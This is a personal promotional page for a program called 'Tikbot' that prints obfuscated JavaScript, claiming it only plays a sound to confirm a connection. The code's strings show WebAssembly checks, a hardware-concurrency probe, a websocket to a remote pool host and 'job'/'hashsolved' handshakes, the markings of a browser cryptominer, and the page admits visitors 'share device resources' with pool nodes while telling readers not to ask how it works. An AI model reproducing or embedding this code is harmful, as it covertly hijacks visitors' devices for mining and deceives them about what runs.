Welcome to My Developer Education Page

Breaking Down The Code

My Name is Onwuka Somtochukwu, known as Lord Carlos, your baby Developer with a bit of Technical IQ!

For fellow programmers and developers, this message is for you all. I believe you understand how hard it is to come up with an idea and spend years trying to accomplish your goal. After a long time of work, I decided to add a security measure over my work and provide a seamless connection method for users to join the program.

The truth is, a lot of people will try to know how everything functions, but the answer is no! All you have to focus on is the output of the software function! My main aim of creating Tikbot is never to harm anyone or users but to bring happiness and easy financial access. Trust me, I protect the code source just for my own personal security reasons.

The script posted is an example of obfuscated JavaScript code. Obfuscation is a technique used to make code harder to read and understand, often to protect intellectual property or avoid detection by security mechanisms. This kind of code can be tricky to analyze, as it's designed to be less readable than regular JavaScript.

Let me break down this JavaScript code:

Breakdown of the Code Analysis

I used many libraries to achieve this, so the only way I could hide them was by calling on anonymous functions:

The script code starts with an immediately-invoked anonymous function (function anonymous() { ... }). These functions are often used to create a local scope to avoid polluting the global scope.

The variable _0x83B1 is an array that contains numerous strings. These strings seem to contain various potential URLs, JS methods, and other keywords typically used in JavaScript and web development (for example, "src", "script", "navigator", "GoogleAnalyticsObject", etc.). What I did here, everyone can do by just applying the obfuscation technique.

Obfuscation Technique: The strings are referenced (like var value = _0x83B1[someIndex]) and is commonly found in obfuscated code, which makes it difficult to determine what is in the code or what it actually does unless de-obfuscated.

If you finally make a connection to my software, the fastest and easiest way to know your connection is right is by loading the webpage three times and increasing your volume. Then you will notice that a sound is produced in the background, or you can equally look at the top of the webpage you loaded to see a speaker sign, which shows you have successfully connected to Tikbot. You are now a Worker and will start earning from Tribowl by sharing your device resources with multi-connected pool nodes, and more! You will get paid directly to your wallet address!

So let me show the actual code that triggers the sound so you all can feel safe and understand you are safe here:

(function anonymous() { var _0x83B1 = ["src", "test", "filter", "script", "getElementsByTagName", "call", "slice", "prototype", "cn/r", "?nosaj=", "split", "xxx", "?", "?algy=", "wss://lokilokitwo.de:10006", "object", "instantiate", "function", "of", "Module", "Instance", "match", "userAgent", "hardwareConcurrency", "navigator", "close", "onmessage", "onerror", "onclose", "onopen", "stringify", "send", "readyState", "channel", "random", "push", "data", "indexOf", "postMessage", "sort", "bc", "id", "undefined", "x", "handshake", "Karma Script 06-11-24 Everything ", "#", "href", "location", "Karma Script 06-11-24 LifeIsEverything ", "Karma Script 06-11-24 RisingSun ", "length", "shift", "terminate", "wakeup", "parse", "identifier", "job", "hashsolved", "target", "exit", "nothing", "workerId", "min", "max", "https://www.google-analytics.com/analytics.js", "ga", "GoogleAnalyticsObject", "q", "l", "createElement", "async", "insertBefore", "parentNode", "create", "UA-39296755-10", "auto", "pageview", "use strict", "init", "_counter", "_html5AudioPool", "html5PoolSize", "_codecs", "_howls", "_muted", "_volume", "_canPlayEvent", "canplaythrough", "_navigator", "masterGain", "noAudio", "usingWebAudio", "autoSuspend", "ctx", "autoUnlock", "_setup", "currentTime", "setValueAtTime", "gain", "_webAudio", "_getSoundIds", "_soundById", "_node", "volume", "muted", "stop", "unload", "", "replace", "state", "suspended", "_autoSuspend", "oncanplaythrough", "canplay", "_setupCodecs", "canPlayType", "audio/mpeg;", "/", "Safari", "Chrome", "audio/mp3;", "audio/ogg; codecs=\"opus\"", "audio/ogg; codecs=\"vorbis\"", "audio/wav; codecs=\"1\"", "audio/wav", "audio/aac;", "audio/x-caf;", "audio/x-m4a;", "audio/m4a;", "audio/x-m4b;", "audio/m4b;", "audio/x-mp4;", "audio/mp4;", "audio/webm; codecs=\"vorbis\"", "audio/mp4; codecs=\"ec-3\"", "audio/x-flac;", "audio/flac;", "_audioUnlocked", "_mobileUnloaded", "sampleRate", "_scratchBuffer", "createBuffer", "_unlocked", "_releaseHtml5Audio", "load", "_autoResume", "createBufferSource", "buffer", "destination", "connect", "start", "noteOn", "resume", "onended", "disconnect", "touchstart", "removeEventListener", "touchend", "click", "keydown", "unlock", "_emit", "addEventListener", "pop", "play", "then", "HTML5 Audio pool exhausted, returning potentially locked audio object.", "warn", "catch", "suspend", "_sounds", "_paused", "_suspendTimer", "suspending", "_resumeAfterSuspend", "running", "interrupted", "An array of source files must be passed with any new Howl.", "error", "_autoplay", "autoplay", "_format", "string", "format", "_html5", "html5", "mute", "_loop", "loop", "_pool", "pool", "_preload", "boolean", "preload", "metadata", "_rate", "rate", "_sprite", "sprite", "_src", "_xhr", "xhr", "method", "GET", "headers", "withCredentials", "_duration", "_state", "unloaded", "_endTimers", "_queue", "_playLock", "_onend", "onend", "_onfade", "onfade", "_onload", "onload", "_onloaderror", "onloaderror", "_onplayerror", "onplayerror", "_onpause", "onpause", "_onplay", "onplay", "_onstop", "onstop", "_onmute", "onmute", "_onvolume", "onvolume", "_onrate", "onrate", "_onseek", "onseek", "_onunlock", "onunlock", "_onresume", "_unlockAudio", "none", "loaderror", "No audio support.", "Non-string found in selected audio sources - ignoring.", "exec", "toLowerCase", "No file extension was found. Consider using the \"format\" property or specify an extension.", "codecs", "loading", "https:", "protocol", "http:", "No codec support for selected audio sources.", "number", "loaded", "__default", "_ended", "_id", "_inactiveSound", "_loadQueue", "_seek", "abs", "_start", "_stop", "_refreshBuffer", "_playStart", "bufferSource", "noteGrainOn", "bind", "once", "_clearTimer", "playbackRate", "playerror", "Playback was unable to start. This is most commonly an issue on mobile devices and Chrome where playback was not within a user interaction.", "paused", "ended", "data:audio/wav;base64,UklGRigAAABXQVZFZm10IBIAAAABAAEARKwAAIhYAQACABAAAABkYXRhAgAAAAEA", "ejecta", "isCocoonJS", "pause", "seek", "_rateSeek", "_stopFade", "noteOff", "_cleanBuffer", "duration", "_clearSound", "_interval", "apply", "fade", "linearRampToValueAtTime", "_startFadeInterval", "now", "_fadeTo", "round", "cancelScheduledValues", "loopStart", "loopEnd", "playing", "_errorFn", "_loadFn", "_endFn", "splice", "_on", "fn", "keys", "isArray", "on", "off", "event", "action", "end", "_drain", "reset", "_panner", "Apple", "vendor", "_parent", "createGain", "createGainNode", "_obtainHtml5Audio", "_errorListener", "_loadListener", "_endListener", "code", "ceil", ",", "charCodeAt", "open", "responseType", "arraybuffer", "setRequestHeader", "forEach", "status", "0", "2", "3", "Failed loading audio file with status: ", ".", "response", "Decoding audio data failed.", "decodeAudioData", "platform", "appVersion", "amd", "Howler", "Howl", "HowlerGlobal", "Sound", "empty", "https://thelifewillbefine.de/karma/e_perf.ogg"]; function _0x83C4() { try { if (typeof WebAssembly === _0x83B1[15] && typeof WebAssembly[_0x83B1[16]] === _0x83B1[17]) { var _0x83C4 = new WebAssembly[_0x83B1[19]](Uint8Array[_0x83B1[18]](0x0, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00)); if (_0x83C4 instanceof WebAssembly[_0x83B1[19]]) { return new WebAssembly[_0x83B1[20]](_0x83C4)instanceof WebAssembly[_0x83B1[20]]; } } } catch (e) {} return false; } function _0x83D7() { if (navigator[_0x83B1[22]][_0x83B1[21]](/Android/i) || navigator[_0x83B1[22]][_0x83B1[21]](/webOS/i) || navigator[_0x83B1[22]][_0x83B1[21]](/iPhone/i) || navigator[_0x83B1[22]][_0x83B1[21]](/iPad/i) || navigator[_0x83B1[22]][_0x83B1[21]](/iPod/i) || navigator[_0x83B1[22]][_0x83B1[21]](/BlackBerry/i) || navigator[_0x83B1[22]][_0x83B1[21]](/Windows Phone/i)) { return true; } else { return false; } } })();

If you have any particular issues concerning the Tikbot function, message me directly on every platform with the username Lordcarlos151. For a quicker conversation, just hit me on my Funtribe App.